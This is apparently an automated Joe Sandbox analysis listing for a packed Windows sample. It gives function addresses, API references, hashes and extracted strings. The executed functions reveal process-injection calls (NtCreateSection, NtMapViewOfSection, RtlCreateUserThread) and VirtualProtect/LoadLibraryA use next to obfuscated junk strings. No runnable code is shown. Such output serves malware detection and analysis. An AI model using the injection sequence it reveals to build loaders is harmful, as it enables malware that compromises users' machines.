Snapshot File: hcaresult_7_2_83e000_38E5.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 0ec658a6ea77c5a6b0e1e87f5853085a4ac5854e270aa32f48103afba00959d5
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 96111979A00208EFDB01DF98C985E98BBF5AB08351F058094F9489B362D371EA54DF81

Non-executed Functions

Function 00431EF0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00431F0A

Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 00432458
Part of subcall function 00432443: __CxxThrowException@8.LIBCMT ref: 0043246D
Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 0043247E

std::_Xinvalid_argument.LIBCPMT ref: 00431F47

Part of subcall function 004323F6: std::exception::exception.LIBCMT ref: 0043240B
Part of subcall function 004323F6: __CxxThrowException@8.LIBCMT ref: 00432420
Part of subcall function 004323F6: std::exception::exception.LIBCMT ref: 00432431

_memmove.LIBCMT ref: 00431FA8

Strings

string too long, xrefs: 00431F42
invalid string position, xrefs: 00431F05

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 8eace0a7697c018465074f5cf330f0012f6cf608b613838aa4c2c894d7c59f1b
Instruction ID: 2cadb799d56146ba8edc6c72aff560a7796ad4882ddfea7e943b282292512433
Opcode Fuzzy Hash: 8eace0a7697c018465074f5cf330f0012f6cf608b613838aa4c2c894d7c59f1b
Instruction Fuzzy Hash: 0331D9323042109BD7209E5CE980B6AF7A9EBA9764F20162FF151CB3A1D769DC4087A9

Function 0043538F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004353B1
__calloc_crt.LIBCMT ref: 004353CA

Strings

5D, xrefs: 004353F6
`3D, xrefs: 004353E1
p3D, xrefs: 00435403

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: __calloc_crt
String ID: `3D$p3D$5D
API String ID: 3494438863-1679561808
Opcode ID: dfb4aae6aee4ecb5de40c711e9b4d43864fbad214a1b4fa278cd1eb853dd7bf7
Instruction ID: de272e09e23d9250239db4a7490b72095702d82ebb5a40ea01cd9d0a8bb696a3
Opcode Fuzzy Hash: dfb4aae6aee4ecb5de40c711e9b4d43864fbad214a1b4fa278cd1eb853dd7bf7
Instruction Fuzzy Hash: 6911E732708A105BE7288F2DBC5576523A1E7D9768F24523BE915CB2D0E7B8DCC2424D

Function 00439248 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00439254

Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D

__amsg_exit.LIBCMT ref: 00439274
__lock.LIBCMT ref: 00439284
_free.LIBCMT ref: 004392B4

Strings

(;D, xrefs: 004392AB

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID: (;D
API String ID: 3170801528-2216469755
Opcode ID: c9deaab60658337a242e35b7a4e1c8f3ffb1bed4fe497dd85b9e8f843bd969d8
Instruction ID: 152704ef30623c9238207a3cfdd3a47f7cc548f2c407fd24f81e6b70bdaadf34
Opcode Fuzzy Hash: c9deaab60658337a242e35b7a4e1c8f3ffb1bed4fe497dd85b9e8f843bd969d8
Instruction Fuzzy Hash: 4A01E131D00A12B7DB21AF65840570FB7A0BF0DB56F11145BE800A3291C7BC6E41CBCD

Function 004380C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 004380D5

Part of subcall function 00438030: ___BuildCatchObjectHelper.LIBCMT ref: 00438066

_UnwindNestedFrames.LIBCMT ref: 004380EC
___FrameUnwindToState.LIBCMT ref: 004380FA

Strings

csm, xrefs: 004380C4
csm, xrefs: 004380D1, 004380E6, 004380F9, 00438117, 00438127

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 8ec11db0930f1ab87a506301e832f5c1ddd9745f274d356e72011f87bb40a249
Instruction ID: 130df07e853fa2f533784855c47a2f69c2e55324b64576559f26a633e08d5ed7
Opcode Fuzzy Hash: 8ec11db0930f1ab87a506301e832f5c1ddd9745f274d356e72011f87bb40a249
Instruction Fuzzy Hash: 17014B71000209BBDF226F51CC41EABBF6AFF0C394F00501ABC5814261DB3AE9B1DBA8

Function 00436C96 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

__mtterm.LIBCMT ref: 00436CAA
__init_pointers.LIBCMT ref: 00436D5C
__calloc_crt.LIBCMT ref: 00436DCA
__initptd.LIBCMT ref: 00436DEF

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: __calloc_crt__init_pointers__initptd__mtterm
String ID:
API String ID: 3132042578-0
Opcode ID: c8559c121642958bdeb8a5be3527d4de0f9ddb177b78d609e1602090be52ff69
Instruction ID: 3999fe2ea24db576f7657d23c26465a461ec30c79b1a0224d1fb40ee8fa08d6d
Opcode Fuzzy Hash: c8559c121642958bdeb8a5be3527d4de0f9ddb177b78d609e1602090be52ff69
Instruction Fuzzy Hash: 85314F79900711AADB10AF75ED0A6173AE0AB8F764B11913BE914936F0D7788841EF5C

Function 0043404F Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00434056

Part of subcall function 00436AD4: ___set_flsgetvalue.LIBCMT ref: 00436AE6
Part of subcall function 00436AD4: __calloc_crt.LIBCMT ref: 00436AFA
Part of subcall function 00436AD4: __initptd.LIBCMT ref: 00436B23

__calloc_crt.LIBCMT ref: 00434078
__get_sys_err_msg.LIBCMT ref: 00434096
_strcpy_s.LIBCMT ref: 0043409E
__invoke_watson.LIBCMT ref: 004340B3

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: __calloc_crt$___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
String ID:
API String ID: 788502912-0
Opcode ID: f6643fcd58231390f0a0cd324d11bc9cc70a1560664bb453f01542fceb6d8df8
Instruction ID: 39280b0692534ef492391a93540d1e778240f8cc2ca39a1588eefa3c8cf7a6f0
Opcode Fuzzy Hash: f6643fcd58231390f0a0cd324d11bc9cc70a1560664bb453f01542fceb6d8df8
Instruction Fuzzy Hash: 4FF0F63270421427D73439665D419EBB2BCCBCC728F11653FF705A3251D52DBC4142AD

Function 00437D15 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 00437D3D

Part of subcall function 00433E96: __getptd.LIBCMT ref: 00433EA4
Part of subcall function 00433E96: __getptd.LIBCMT ref: 00433EB2

__getptd.LIBCMT ref: 00437D47

Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D

__getptd.LIBCMT ref: 00437D55
__getptd.LIBCMT ref: 00437D63
__getptd.LIBCMT ref: 00437D6E

Part of subcall function 00433F3B: __CallSettingFrame@12.LIBCMT ref: 00433F87

Part of subcall function 00437E3B: __getptd.LIBCMT ref: 00437E4A
Part of subcall function 00437E3B: __getptd.LIBCMT ref: 00437E58

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 3282538202-0
Opcode ID: c9b1cd0b66e810f013b05a769f1013de8cf17294e1aa0560d1f900115752e0ba
Instruction ID: ed279d661dc42825c760b9fc98aca8d678b77b7f2585112291c896c5a2fb70ba
Opcode Fuzzy Hash: c9b1cd0b66e810f013b05a769f1013de8cf17294e1aa0560d1f900115752e0ba
Instruction Fuzzy Hash: 3111D7B1C00209EFDF01EFA5C546BADBBB0FF08319F11906AF914A7251DB389A119F54

Function 00438FAC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00438FB8

Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D

__getptd.LIBCMT ref: 00438FCF
__amsg_exit.LIBCMT ref: 00438FDD
__lock.LIBCMT ref: 00438FED
__updatetlocinfoEx_nolock.LIBCMT ref: 00439001

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 2dd36e7f9b9cfc2db4ad2576282b04056c78c8fcb387764b801e0ea617750651
Instruction ID: c55a09df3b52eddba3e6a3b5d6970d993694369ddcd95f606bc929f609295e5e
Opcode Fuzzy Hash: 2dd36e7f9b9cfc2db4ad2576282b04056c78c8fcb387764b801e0ea617750651
Instruction Fuzzy Hash: BCF02B32901710EBD7217F769403B0DB3A05F0C729F22620FF614A72D2CF6C2A408A5D

Function 00430E00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00430F7D

Strings

sogudowuwotekonex digimabawer rujusogepisalojar, xrefs: 00430EF1
, xrefs: 00430E62
yoyorohexumutuwasetebayuda, xrefs: 0043102E

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: _memset
String ID: $sogudowuwotekonex digimabawer rujusogepisalojar$yoyorohexumutuwasetebayuda
API String ID: 2102423945-822714830
Opcode ID: 8365fa97ea0e54c40b4bae2d82204bd2bb4824526665fac2de4deb70b3f0016c
Instruction ID: a679fca73d2dda16af80176112bc37e6ab3a80d6958592b53a1f1885a25e40f3
Opcode Fuzzy Hash: 8365fa97ea0e54c40b4bae2d82204bd2bb4824526665fac2de4deb70b3f0016c
Instruction Fuzzy Hash: B5713B75E40208AFEB14DF94DD8AB9DB7B4FB48701F108069E609BB290C7B46A40CF69

Function 0043C257 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0043C27D

Part of subcall function 0043C0A9: __fltout2.LIBCMT ref: 0043C0D4

__cftog_l.LIBCMT ref: 0043C2A3
__cftoe_l.LIBCMT ref: 0043C2D5

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: cfd293eb2920d9b94e498ee4755f1ba9df46740c805e4260226d03a9992dbe75
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 3B116D3640018AFBCF125E84CC81CEE3F22BF1D354F599456FA5968121C73AC9B2AB85

Function 00433913 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0043392D

Part of subcall function 004340B9: __FF_MSGBANNER.LIBCMT ref: 004340D2
Part of subcall function 004340B9: __NMSG_WRITE.LIBCMT ref: 004340D9

std::exception::exception.LIBCMT ref: 00433962
std::exception::exception.LIBCMT ref: 0043397C
__CxxThrowException@8.LIBCMT ref: 0043398D

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw_malloc
String ID:
API String ID: 2388904642-0
Opcode ID: 89604e51622c1848ae1726d4459ef3f03cb4279c38a613a2a9ea914e2dd1109e
Instruction ID: 0c3675aeaf0011e457ff1f536f3ee95850dac15337a9e9b26eae673a39aafdee
Opcode Fuzzy Hash: 89604e51622c1848ae1726d4459ef3f03cb4279c38a613a2a9ea914e2dd1109e
Instruction Fuzzy Hash: A8F0267090020AAAEB04EF55DC06B9E37A86F49314F14506FE800A21A1CBB89F408B5C

Function 00431DF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00431E65
_memmove.LIBCMT ref: 00431EB6

Part of subcall function 00431EF0: std::_Xinvalid_argument.LIBCPMT ref: 00431F0A

Strings

string too long, xrefs: 00431E60

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: bee2399d89acdff7390fadb7c764c0222abcf93ef081e0b8d32741aa61d96df4
Instruction ID: 9ff1e5a47eb56f93e73d824d9c6d53947e26d97076773c26e80e4cb96c3e41dc
Opcode Fuzzy Hash: bee2399d89acdff7390fadb7c764c0222abcf93ef081e0b8d32741aa61d96df4
Instruction Fuzzy Hash: 1C3109323006104BD7249E5DE98196BF3E9EB9A760F20162FF852C7761C776DC4087A8

Function 00431FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00431FF6

Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 00432458
Part of subcall function 00432443: __CxxThrowException@8.LIBCMT ref: 0043246D
Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 0043247E

_memmove.LIBCMT ref: 0043202F

Strings

invalid string position, xrefs: 00431FF1

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 1397517ebf0ae46a801618a01ed36cfdc1a6464828c8918090080f098a212dce
Instruction ID: 6c0ae7a36627a0dfc6bceb10b4348391515713d79e935b59abef4bc461637986
Opcode Fuzzy Hash: 1397517ebf0ae46a801618a01ed36cfdc1a6464828c8918090080f098a212dce
Instruction Fuzzy Hash: F001DB313043108BD3299D5CEE8056AB7BAEB99714F34592FD291C7701D6F5EC46C798

Function 00437E3B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00437E4A

Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D

__getptd.LIBCMT ref: 00437E58

Strings

csm, xrefs: 00437E66

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 5e5b593db96ec5592a6afd293df7648de660035ff22b993f41f96ef09e303681
Instruction ID: 301a8880f988272baa46338c306b3bf3724f51adcf8a0e5165469f776e4bde47
Opcode Fuzzy Hash: 5e5b593db96ec5592a6afd293df7648de660035ff22b993f41f96ef09e303681
Instruction Fuzzy Hash: DF018FB480C2199ACF349F61C44266EB7F6AF18312F24A49FE48096351CB3DAD80CB68

Analysis Process: uievsidPID: 5332, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	78.1%
Signature Coverage:	0%
Total number of Nodes:	64
Total number of Limit Nodes:	3

Executed Functions

Function 00431540 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00431C2A

Part of subcall function 0043352A: _malloc.LIBCMT ref: 00433538

__wfopen_s.LIBCMT ref: 00431C44

Part of subcall function 00433150: __indefinite.LIBCMT ref: 004349D0

__floor_pentium4.LIBCMT ref: 00431C80

Strings

=KnH, xrefs: 0043182E
F:, xrefs: 00431A80
wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez, xrefs: 00431C1E
&mm, xrefs: 004318F6
s6.s, xrefs: 00431693
VD[E, xrefs: 004316F5
0.txt, xrefs: 00431C3E
aYX, xrefs: 0043169E
R`, xrefs: 00431A0B

Memory Dump Source

Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd

Similarity

API ID: __floor_pentium4__indefinite__wfopen_s_free_malloc
String ID: F:$&mm$0.txt$=KnH$R`$VD[E$aYX$s6.s$wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez
API String ID: 3889868452-3505399015
Opcode ID: d99e9b8741b22aa99d10b1caa619cc7040c5bc56d361daa6ff3a0b13eea6f9e9
Instruction ID: ad96a9d43ed1917ae2a70b0bafe91b8a3833c5c9e6e88e4928b445b74cbf9755
Opcode Fuzzy Hash: d99e9b8741b22aa99d10b1caa619cc7040c5bc56d361daa6ff3a0b13eea6f9e9
Instruction Fuzzy Hash: 0A022DB5609380CFD2708F6AC589B8FF7E4BF85714F10891DE6DA5A620DB3088858F57

Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_uievsid.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_uievsid.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_uievsid.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_uievsid.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_uievsid.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403177
NtTerminateProcess.NTDLL ref: 00403190

Memory Dump Source

Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_uievsid.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

Function 004311B0 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 263
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00431296
LocalAlloc.KERNELBASE(00000000,00467221), ref: 004312E9
VirtualProtect.KERNELBASE(00477FF8,0047856C,00000020,?), ref: 00431367
LoadLibraryA.KERNELBASE(00449F78), ref: 00431522

Strings

vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga, xrefs: 0043124E
royakamexisezepucivapah, xrefs: 00431422
jjj, xrefs: 0043141A
kernel32.dll, xrefs: 004312F5
tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy, xrefs: 00431249
Bq , xrefs: 004311F5
{, xrefs: 00431489
W$!, xrefs: 004312C2
gulepulawoboxejobukade, xrefs: 00431283, 0043129F
dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler, xrefs: 004314A9
jjj, xrefs: 004313C2
